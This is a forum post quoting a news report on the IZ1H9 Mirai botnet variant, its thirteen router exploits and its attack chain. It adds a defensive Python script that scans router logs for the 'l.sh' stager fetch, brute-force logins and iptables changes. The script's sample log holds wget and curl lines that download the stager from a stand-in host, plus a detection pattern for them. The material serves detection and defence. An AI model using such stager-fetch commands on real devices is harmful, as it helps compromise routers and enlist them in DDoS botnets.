Mirai DDoS malware variant expands targets with 13 router exploits
<blockquote data-quote="Jakesu" data-source="post: 31" data-attributes="member: 7">
<p>A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.</p>
<p>Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.</p>
<p>IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.</p>
<p><img src="https://www.bleepstatic.com/images/news/u/1220909/2023/WordPress/14/exploit-attempts.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<table style='width: 100%'><tr><td>Observed exploitation attempts throughout September (Fortinet)</td></tr></table>
<p><strong>Extensive IoT targeting</strong></p>
<p>The more devices and vulnerabilities a DDoS malware targets, the greater its potential to build a large and powerful botnet capable of delivering massive blows against websites.</p>
<p>In the case of IZ1H9, Fortinet reports it uses exploits for the following flaws, dating from 2015 to 2023:</p>
<ul>
<li data-xf-list-type="ul"><strong>D-Link devices:</strong> CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382</li>
<li data-xf-list-type="ul"><strong>Netis WF2419:</strong> CVE-2019-19356</li>
<li data-xf-list-type="ul"><strong>Sunhillo SureLine</strong> (versions before 8.7.0.1.1): CVE-2021-36380</li>
<li data-xf-list-type="ul"><strong>Geutebruck products:</strong> CVE-2021-33544, CVE-2021-33548, CVE-2021-33549, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554</li>
<li data-xf-list-type="ul"><strong>Yealink Device Management (DM) 3.6.0.20:</strong> CVE-2021-27561, CVE-2021-27562</li>
<li data-xf-list-type="ul"><strong>Zyxel EMG3525/VMG1312 (before V5.50):</strong> CVE not specified, but targets a vulnerability in the Zyxel device’s /bin/zhttpd/ component</li>
<li data-xf-list-type="ul"><strong>TP-Link Archer AX21 (AX1800):</strong> CVE-2023-1389</li>
<li data-xf-list-type="ul"><strong>Korenix JetWave wireless AP:</strong> CVE-2023-23295</li>
<li data-xf-list-type="ul"><strong>TOTOLINK routers:</strong> CVE-2022-40475, CVE-2022-25080, CVE-2022-25079, CVE-2022-25081, CVE-2022-25082, CVE-2022-25078, CVE-2022-25084, CVE-2022-25077, CVE-2022-25076, CVE-2022-38511, CVE-2022-25075, CVE-2022-25083</li>
</ul>
<p>The campaign also targets an unspecified CVE related to the “/cgi-bin/login.cgi” route, potentially affecting the Prolink PRC2402M router.</p>
<p><strong>Attack chain</strong></p>
<p>After exploiting one of the aforementioned CVEs, an IZ1H9 payload is injected into the device containing a command to fetch a shell script downloader named “l.sh” from a specified URL.</p>
<p>Upon execution, the script deletes logs to hide the malicious activity, and next, it fetches bot clients tailored for different system architectures.</p>
<p>Finally, the script modifies the device’s iptables rules to obstruct connections on specific ports and make it harder to remove the malware from the device.</p>
<p>Having done all the above, the bot establishes communication with the C2 (command and control) server and waits for commands to execute.</p>
<p>The supported commands concern the type of DDoS attack to launch, including UDP, UDP Plain, HTTP Flood, and TCP SYN.</p>
<p><img src="https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/commands.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<table style='width: 100%'><tr><td>DDoS commands (Fortinet)</td></tr></table>
<p>Fortinet also reports that IZ1H9 features a data section with hardcoded credentials used for brute-force attacks.</p>
<p><a href="https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/creds.png" target="_blank"><img src="https://www.bleepstatic.com/images/news/u/1220909/2023/DDoS/17/creds.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></a></p>
<table style='width: 100%'><tr><td>Hardcoded credentials (Fortinet)</td></tr></table>
<p>These attacks might be helpful for propagation to adjacent devices or for authenticating to IoT devices for which it does not have a working exploit.</p>
<p>Owners of IoT devices are recommended to use strong admin user credentials, update the devices to the latest available firmware version, and, if possible, reduce their exposure to the public internet.</p>
</blockquote>
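<p>The attack chain and the brute-force behaviour described in the quoted post give a defender three concrete things to look for on a router or IoT gateway: an inbound request carrying a fetch of the "l.sh" downloader, a burst of failed admin logins from one source, and unexpected iptables DROP/REJECT rules appearing on the device. The script below is an added example written for this thread, not code from Fortinet, BleepingComputer or the post's author. The log format, the IP addresses, the <code>/setup.cgi</code> path and the brute-force threshold are all constructed assumptions; only the <code>/cgi-bin/login.cgi</code> and <code>/bin/zhttpd/</code> routes and the "l.sh" name come from the post. It generalises slightly beyond the text by flagging the downloader fetch on any route, since the article lists thirteen different exploits but one common stager.</p>

```python
"""Triage of constructed router/IoT gateway logs for the behaviours the
IZ1H9 write-up describes. Added example, not Fortinet's or the post's code.

Three detections:
  1. an HTTP request body that pulls the "l.sh" stager (exploitation),
  2. requests that only touch the routes the article names (probing),
  3. repeated failed admin logins from one source (hardcoded-credential
     brute force) and iptables DROP/REJECT rules added on the device.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List

# Routes named in the article. Other exploited endpoints are not listed on
# the page, so matching here is deliberately limited to these prefixes.
SUSPECT_PATHS = ("/cgi-bin/login.cgi", "/bin/zhttpd/")

# The stager name "l.sh" is from the article; the fetch verbs are an assumption.
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b.*?\bl\.sh\b")

# Constructed log formats (assumption): one line per event, tagged by source.
HTTP_RE = re.compile(
    r'^httpd: (?P<src>\S+) "(?P<method>GET|POST) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) body="(?P<body>.*)"$'
)
LOGIN_FAIL_RE = re.compile(r"^auth: login failed for user '(?P<user>[^']+)' from (?P<src>\S+)$")
IPTABLES_RE = re.compile(r"^kernel: (?P<rule>iptables .*-j (?:DROP|REJECT).*)$")

BRUTE_FORCE_THRESHOLD = 5  # failed logins from one source before alerting (assumption)


@dataclass
class Findings:
    exploit_attempts: List[str] = field(default_factory=list)  # "src METHOD path"
    probes: List[str] = field(default_factory=list)            # suspect route, no stager
    brute_force: Dict[str, int] = field(default_factory=dict)  # src -> failed logins
    firewall_changes: List[str] = field(default_factory=list)  # raw iptables rules


def triage(log_text: str) -> Findings:
    """Walk the log once and bucket each line into the findings above."""
    findings = Findings()
    failures: Counter = Counter()
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HTTP_RE.match(line)
        if m:
            on_suspect_route = m["path"].startswith(SUSPECT_PATHS)
            fetches_stager = DOWNLOADER_RE.search(m["body"]) is not None
            tag = f"{m['src']} {m['method']} {m['path']}"
            if fetches_stager:
                findings.exploit_attempts.append(tag)
            elif on_suspect_route:
                findings.probes.append(tag)
            continue
        m = LOGIN_FAIL_RE.match(line)
        if m:
            failures[m["src"]] += 1
            continue
        m = IPTABLES_RE.match(line)
        if m:
            findings.firewall_changes.append(m["rule"])
    findings.brute_force = {s: n for s, n in failures.items() if n >= BRUTE_FORCE_THRESHOLD}
    return findings


def summarize(findings: Findings) -> List[str]:
    """Human-readable alert lines, one per finding."""
    out = [f"EXPLOIT stager fetch: {t}" for t in findings.exploit_attempts]
    out += [f"PROBE suspect route: {t}" for t in findings.probes]
    out += [f"BRUTE-FORCE {s}: {n} failed logins" for s, n in findings.brute_force.items()]
    out += [f"FIREWALL rule added: {r}" for r in findings.firewall_changes]
    return out


# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
httpd: 203.0.113.10 "POST /cgi-bin/login.cgi HTTP/1.1" 200 body="(payload) wget http://198.51.100.7/l.sh"
httpd: 198.51.100.23 "GET /index.html HTTP/1.1" 200 body=""
httpd: 203.0.113.10 "GET /bin/zhttpd/ HTTP/1.1" 404 body=""
httpd: 203.0.113.77 "POST /setup.cgi HTTP/1.1" 200 body="(payload) curl -o /tmp/l.sh http://198.51.100.7/l.sh"
auth: login failed for user 'admin' from 192.0.2.44
auth: login failed for user 'admin' from 192.0.2.44
auth: login failed for user 'root' from 192.0.2.44
auth: login failed for user 'admin' from 192.0.2.44
auth: login failed for user 'support' from 192.0.2.44
auth: login failed for user 'admin' from 198.51.100.23
kernel: iptables -A INPUT -p tcp --dport 23 -j DROP
kernel: iptables -A INPUT -p tcp --dport 7547 -j DROP
"""

if __name__ == "__main__":
    for alert in summarize(triage(SAMPLE_LOG)):
        print(alert)
```

<p>The stager check is the strongest signal and is applied to every request, so a new exploit route the article does not list still gets caught as long as the same "l.sh" fetch follows it; route-only hits are reported separately as probes so they can be rate-limited or blocked without being mistaken for confirmed compromise. The iptables detection assumes the device forwards kernel or shell audit lines to the collector, which is exactly what the malware's log deletion step is meant to defeat, so shipping logs off the device before it is compromised matters more than the parser.</p>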